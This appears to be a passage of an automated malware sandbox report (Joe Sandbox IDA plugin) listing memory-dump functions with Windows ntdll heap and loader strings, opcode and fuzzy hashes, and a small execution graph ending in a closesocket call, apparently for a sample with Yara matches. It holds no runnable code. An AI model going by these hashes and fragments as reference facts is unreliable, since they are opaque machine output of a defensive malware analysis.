                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                  • API String ID: 3446177414-2196497285
                                                                                                  • Opcode ID: 897b6faa3af26ef5540c5df3144d8b790dda4b3a2a78914b53cb44d33ca2d10d
                                                                                                  • Instruction ID: 43496ae2ff16c49cb656d29294a8bb49e75300038b6e6ee29cbd21831ebe0532
                                                                                                  • Opcode Fuzzy Hash: 897b6faa3af26ef5540c5df3144d8b790dda4b3a2a78914b53cb44d33ca2d10d
                                                                                                  • Instruction Fuzzy Hash: 21E19E746053419FE714CF14CC80B5ABBE4FF88758F508A6EE9968B281DB74EA44CF92
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                  • API String ID: 3446177414-4227709934
                                                                                                  • Opcode ID: 5ca5f5929bce90afab7abbefa5dc61b25dab8cd3dcd822c0d29bd0fa44270783
                                                                                                  • Instruction ID: c1e78fe65050fd79458668111f9d08a9cbf085ee532055a9c5ae8ab2a8512d67
                                                                                                  • Opcode Fuzzy Hash: 5ca5f5929bce90afab7abbefa5dc61b25dab8cd3dcd822c0d29bd0fa44270783
                                                                                                  • Instruction Fuzzy Hash: 43416AB9E01209ABDB01CF98C980AEEBFB5FF48758F101169EC05A7350DB719B41DB90
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                  • API String ID: 3446177414-3492000579
                                                                                                  • Opcode ID: e8ab014ae787260d5b5995efa93c3099ae74e32cfd631e9f459350d982333a24
                                                                                                  • Instruction ID: b35c62b6b923f6348b3e62cfb9d50406c4191d425a3548377987033d68da8403
                                                                                                  • Opcode Fuzzy Hash: e8ab014ae787260d5b5995efa93c3099ae74e32cfd631e9f459350d982333a24
                                                                                                  • Instruction Fuzzy Hash: 7571FE75911285EFDB01CFA8D4906EDFBF2FF89314F448459E485EB251CB719A81CB90
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpLoadShimEngine, xrefs: 3254984A, 3254988B
                                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32549885
                                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32549843
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32549854, 32549895
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-3589223738
                                                                                                  • Opcode ID: b54b64c8b73eb61d96d6aac4e34db8500cc13acfe1c4860f6f408b2246fcb8de
                                                                                                  • Instruction ID: 625fef0fe8eb7a78aaab9a9119b29acfe02abc424fbc0eb053985341489bb614
                                                                                                  • Opcode Fuzzy Hash: b54b64c8b73eb61d96d6aac4e34db8500cc13acfe1c4860f6f408b2246fcb8de
                                                                                                  • Instruction Fuzzy Hash: 24512475A61354DFEB04CFA8CC55BED77A2AB84314F440569F541BF296CB709E82CB80
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                  • API String ID: 3446177414-3224558752
                                                                                                  • Opcode ID: ededa33447d711a4358a878a3a041687e5d7c17db795dd6b76e05cece255d736
                                                                                                  • Instruction ID: 807393ec663bc2fbed0f1162345591f640bd184554d14bcd2a1f29f239e4351a
                                                                                                  • Opcode Fuzzy Hash: ededa33447d711a4358a878a3a041687e5d7c17db795dd6b76e05cece255d736
                                                                                                  • Instruction Fuzzy Hash: DF412675605711EBFB15CF28C484B5ABBA4FF42365F108969E806973C1CB78BB81CB91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • ---------------------------------------, xrefs: 3259EDF9
                                                                                                  • Entry Heap Size , xrefs: 3259EDED
                                                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3259EDE3
                                                                                                  • HEAP: , xrefs: 3259ECDD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                  • API String ID: 3446177414-1102453626
                                                                                                  • Opcode ID: e8863d4bc25fdbc893e8b1d4024ac410082bc9854c13c706613184e8b21ae936
                                                                                                  • Instruction ID: 3af2a1984413dbcb84005bf44d78b9f078ceffcce707478f461b794a825a7cac
                                                                                                  • Opcode Fuzzy Hash: e8863d4bc25fdbc893e8b1d4024ac410082bc9854c13c706613184e8b21ae936
                                                                                                  • Instruction Fuzzy Hash: 55416C79A51215DFD704CF19C580A99BBB5FB49355B1588AEE409AB210DB31EE82CBC0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                  • API String ID: 3446177414-1222099010
                                                                                                  • Opcode ID: 38c409e64e4b94ff9c38258bfdf754e212c7a25b50af3e536f20cd3bf494b00e
                                                                                                  • Instruction ID: 9eda1ac78eb16efa025803ad3e56fbd84a904dca87d16fa4c43cdbeb30a53293
                                                                                                  • Opcode Fuzzy Hash: 38c409e64e4b94ff9c38258bfdf754e212c7a25b50af3e536f20cd3bf494b00e
                                                                                                  • Instruction Fuzzy Hash: 4F312975112784EFFB26CB28C509B497BE8EF02765F004999E44397651CBB5BB80CF51
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 3446177414-1194432280
                                                                                                  • Opcode ID: 9940cf9413c2b4bca7fe437f6a7726d13ac5ac0d625b79ec5ed48bfbe20127d0
                                                                                                  • Instruction ID: 8438a6985cd5891791a714fde2fc6ee329a818666cb9a9da799043ded17ccee3
                                                                                                  • Opcode Fuzzy Hash: 9940cf9413c2b4bca7fe437f6a7726d13ac5ac0d625b79ec5ed48bfbe20127d0
                                                                                                  • Instruction Fuzzy Hash: 24813BB1D002699BDB25CF54CC40BDEB7B8AB48754F5045EAE909B7240EB709F85CFA0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3256344A, 32563476
                                                                                                  • LdrpFindDllActivationContext, xrefs: 32563440, 3256346C
                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 32563466
                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32563439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 3446177414-3779518884
                                                                                                  • Opcode ID: 70bbb4a6f63fa99e54dd6b38b6c9e559ea56ea53298255b4b94132f20c9eff96
                                                                                                  • Instruction ID: 3efd17fb55a423b0cff996d2b118995fff681f6108ebe99aae7784239a5df57b
                                                                                                  • Opcode Fuzzy Hash: 70bbb4a6f63fa99e54dd6b38b6c9e559ea56ea53298255b4b94132f20c9eff96
                                                                                                  • Instruction Fuzzy Hash: 52310EB9A41351FFF7159F0CC884B6ABB94FB4079AF42A566E800771D1DB609F80C6B1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 3446177414-3610490719
                                                                                                  • Opcode ID: f163b202d18ce3158fceec8e108e77ceb5ecf1a1d1a1d4ace257d381e2776324
                                                                                                  • Instruction ID: 9cc5a9df2f07f80a7f2c726daae8b513afe4d57334eba945ce74ce108738e262
                                                                                                  • Opcode Fuzzy Hash: f163b202d18ce3158fceec8e108e77ceb5ecf1a1d1a1d4ace257d381e2776324
                                                                                                  • Instruction Fuzzy Hash: 38911475245740EFF31ACF24C880B6EB7A5BF84785F420559E9829B281DF74EA81CBD2
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpCheckModule, xrefs: 32559F24
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 32559F1C
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32559F2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-161242083
                                                                                                  • Opcode ID: e7383ed435ec4bf557ebb1731e8a202204e9d1480986d8b9ff0222ebcf83d3c8
                                                                                                  • Instruction ID: 44e445a79268ad849551604d31784cb55253c9cd286cb8a3fc3b366cf1e8e6ce
                                                                                                  • Opcode Fuzzy Hash: e7383ed435ec4bf557ebb1731e8a202204e9d1480986d8b9ff0222ebcf83d3c8
                                                                                                  • Instruction Fuzzy Hash: 0F71E5B5A01205DFEF05DF69C940BAEB7F4EB84308F54486DE906E7250E774AB82CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db6943255955bb0416aeca36bb0d576e7cf6b82d1dcac5a8e896394c66effa2b
                                                                                                  • Instruction ID: 92858f18027f6398313a0a3ca1479ba850ea1f9e75ba995b53fdee6151bdbf8c
                                                                                                  • Opcode Fuzzy Hash: db6943255955bb0416aeca36bb0d576e7cf6b82d1dcac5a8e896394c66effa2b
                                                                                                  • Instruction Fuzzy Hash: C6E1CE75940708DFEF25CFA9C980A9DBBF1BF48354F20492AE846E7261DB71AA41CF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 4281723722-0
                                                                                                  • Opcode ID: 76c3a718b72e2335a5b8bb7f948444888cef319d934122f9babfe4e71ce7684d
                                                                                                  • Instruction ID: 26ffe5448a949da7b2df5e7d4d9402cc5ad0f5e5ff8d2e1b7caf363c241af7fd
                                                                                                  • Opcode Fuzzy Hash: 76c3a718b72e2335a5b8bb7f948444888cef319d934122f9babfe4e71ce7684d
                                                                                                  • Instruction Fuzzy Hash: 9B312275E52268DFCB15DFA8D884AEEBBF1AB88321F10456AE911B7280DB305A41CF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 4ca32fe76ba305d34ad677b26874d7349fe01aebeb4d4f4a98a9d6e65f4ba8b0
                                                                                                  • Instruction ID: a30400d2bafe4fe6af973b660a8870ea732e713ef6e4e02822ee8dceb12c11ea
                                                                                                  • Opcode Fuzzy Hash: 4ca32fe76ba305d34ad677b26874d7349fe01aebeb4d4f4a98a9d6e65f4ba8b0
                                                                                                  • Instruction Fuzzy Hash: EA326975D00369EFEB25CF64C944BD9BBB0BF88304F0080EAD559A7241DBB69A85CF91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: ${Y2
                                                                                                  • API String ID: 0-4142145967
                                                                                                  • Opcode ID: 7ed60a9d6373fb78cc8eed86be49d52c49dfa04c49573ca50f54a88f050bd8ce
                                                                                                  • Instruction ID: 462b36a1bb3976a0d139bcf5b7a2c0197cb48269327be242347788b63856b085
                                                                                                  • Opcode Fuzzy Hash: 7ed60a9d6373fb78cc8eed86be49d52c49dfa04c49573ca50f54a88f050bd8ce
                                                                                                  • Instruction Fuzzy Hash: B3B19A71A093419FD710CF29D888B9BBBE5BF84754F505A6EF994CB290DB30DA04CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0$Flst
                                                                                                  • API String ID: 0-758220159
                                                                                                  • Opcode ID: cf265b73fb946d162943986ceaeae9803dffc198ce99b0b3974636ffbf4ebbb4
                                                                                                  • Instruction ID: 0016b13c3ded4eb21959b1c5a4aaccecebcc8ab673b081a9ec34562fe0468a8a
                                                                                                  • Opcode Fuzzy Hash: cf265b73fb946d162943986ceaeae9803dffc198ce99b0b3974636ffbf4ebbb4
                                                                                                  • Instruction Fuzzy Hash: 8B51BEB5A01744CFEB14DF98C484799FBF4EF44B9AF14942AD445AB2C0DBB09A81CB50
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: ^N2
                                                                                                  • API String ID: 3446177414-58235054
                                                                                                  • Opcode ID: 861ffa102b1827625bc6682277f8058c4b40981f2cc11c29f6912d553a775ffb
                                                                                                  • Instruction ID: 1707777660aabe1d5089171aef4aee16fdd111905408a15576e548a60278e684
                                                                                                  • Opcode Fuzzy Hash: 861ffa102b1827625bc6682277f8058c4b40981f2cc11c29f6912d553a775ffb
                                                                                                  • Instruction Fuzzy Hash: 914180B9A00201DFE719CF2AC4805557BF5FF89B61B50846AEC09CB361DB71E991CB90
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: 0$0
                                                                                                  • API String ID: 3446177414-203156872
                                                                                                  • Opcode ID: d4dc2e84cbd6673177c788f5f7c62192cca77966c9d68c9e29b3ad7ebef25274
                                                                                                  • Instruction ID: 75c1fd4e013108fd10a0643c9bb888847ebc0cb973bc1d0b2508d3cea3653300
                                                                                                  • Opcode Fuzzy Hash: d4dc2e84cbd6673177c788f5f7c62192cca77966c9d68c9e29b3ad7ebef25274
                                                                                                  • Instruction Fuzzy Hash: 8A415BB5608701DFD300CF28D444A5ABBE8BB89358F044A6EF989DB340D771EA45CB96
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: N2$mN2
                                                                                                  • API String ID: 3446177414-3949905462
                                                                                                  • Opcode ID: 842b3bbf6ea15da9bf8fbc65ab5b79a700ff963b169a607fd5a4a45b6b062013
                                                                                                  • Instruction ID: 0ce3218bb1acd3874bfcef27222c196b9dd8fb4ad481ecb16e03b7e54fc656f3
                                                                                                  • Opcode Fuzzy Hash: 842b3bbf6ea15da9bf8fbc65ab5b79a700ff963b169a607fd5a4a45b6b062013
                                                                                                  • Instruction Fuzzy Hash: B611B4B6A01218AFDF11CF98D885ADEBBB4FB4C361F104019F911B7240D775AA54CBA0

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.3%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:3
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 12299 6256c0 12300 6256dd 12299->12300 12301 6256ec closesocket 12300->12301

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8941028eee6a55cf84ce46da09fdd4b9cdfaf8b40d80e110fe0f6389fa9e1ddc
                                                                                                  • Instruction ID: 2666ecb912e7cf8355d02f060617ce121d763dcd5f1ba49f94c00d40e2ec2aa7
                                                                                                  • Opcode Fuzzy Hash: 8941028eee6a55cf84ce46da09fdd4b9cdfaf8b40d80e110fe0f6389fa9e1ddc
                                                                                                  • Instruction Fuzzy Hash: B751D131988612ABC7299F34C888AE3F7EAFF47315F04062EE05A8F281D3329545CBD5

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 0 6256c0-6256fa call 5febc0 call 626130 closesocket
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: closesocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 2781271927-0
                                                                                                  • Opcode ID: 7a6603314e12e36ffbcd65ecf2981a90ffa6797e87b79ab539038720f5e3e3db
                                                                                                  • Instruction ID: d69673363a275d7673f5856851b332a0078764e2cd96066b47137343c781f007
                                                                                                  • Opcode Fuzzy Hash: 7a6603314e12e36ffbcd65ecf2981a90ffa6797e87b79ab539038720f5e3e3db
                                                                                                  • Instruction Fuzzy Hash: ABE08C762006147BC260FA59DC01EDB77ADDFC5310F404459FB09A7202CA31B92287F8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Z$ $!Y$!l$-q$/T$8H$:!$;$=$@$A^$D$GS$J$J$K$L$R$U$X$aJ$d$j$o$p$s$to$xT$}$L$[$|
                                                                                                  • API String ID: 0-1942597448
                                                                                                  • Opcode ID: 026fcc8da7655f588732f10409a8b30ded7d53ed1cf6a148acf5ce9f5956984a
                                                                                                  • Instruction ID: 123267039098ab7d94c5d9be7737dcb239c41a299a5be9a9725105143818d06d
                                                                                                  • Opcode Fuzzy Hash: 026fcc8da7655f588732f10409a8b30ded7d53ed1cf6a148acf5ce9f5956984a
                                                                                                  • Instruction Fuzzy Hash: 9A32B1B0D45229CBEB28CF44C9947DEBBB2BB45308F1081D9D5096B281C7B96EC9DF85
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 4d53b56b07a2beb258f8b53df1fc325f7f0e028e19a9dbaf617c1271c73930c2
                                                                                                  • Instruction ID: a144efd14fa575a5381ced4701bbdb3b2178164f83857941ac46a129ab91e0b8
                                                                                                  • Opcode Fuzzy Hash: 4d53b56b07a2beb258f8b53df1fc325f7f0e028e19a9dbaf617c1271c73930c2
